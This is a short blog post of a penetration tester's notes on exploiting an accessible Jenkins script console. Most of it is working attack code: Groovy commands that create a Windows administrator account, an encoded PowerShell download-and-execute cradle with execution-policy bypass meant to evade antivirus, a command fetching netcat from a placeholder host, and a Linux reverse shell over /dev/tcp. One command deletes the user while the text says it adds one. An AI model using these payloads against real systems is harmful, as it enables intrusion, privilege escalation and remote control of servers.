Star InactiveStar InactiveStar InactiveStar InactiveStar Inactive

Hello all,

This type of posts will be a small technical notes about abusing/exploiting something. Just to not forget =)

During the last real world penetration test Jenkins was found. It was installed on Windows and my goal was to receive reverse shell and avoid possible AV detection.

A part how I gained an access to Jenkins is not here, only small technical notes =)

Also a part about powershell payload is not described here.


1) Add windows user with administrator rights. I know that you think it is simple and it is true =)

def process = "cmd /c net user username SECUREPASSWORD /delete".execute()
println "${process.text}"

def process = "cmd /c net localgroup administrators username /add".execute()
println "${process.text}"

Creating an user and adding to administrator group are not stealthy actions, but I put it here for a history.


2) Powershell execution in groovy script

PS command: iex (New-Object Net.WebClient).DownloadString('https://HOST/payload')

Encode: echo "iex (New-Object Net.WebClient).DownloadString('https://HOST/payload)" | iconv --to-code UTF-16LE | base64 -w 0


String to execute: cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc BASE64string

Groovy: def process = "cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc aQBlAHgAIAAoA...A".execute()

               println "${process.text}"              


File download: powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://HOST/nc64.exe', 'C:\Jenkins\nc64.exe') }"

Encode: echo "& { (New-Object Net.WebClient).DownloadFile('https://HOST/nc64.exe', 'C:\Jenkins\nc64.exe') }" | iconv --to-code UTF-16LE | base64 -w 0

Groovydef process = "cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc Base64String".execute()

               println "${process.text}"  


3) And reverse shell for Jenkins on Linux =) Thank you pentestmonkey for Java reverse shell.


r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IPADDR/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])


P.S.: set strong password on your Jenkins


Thank you for reading

Add comment

Security code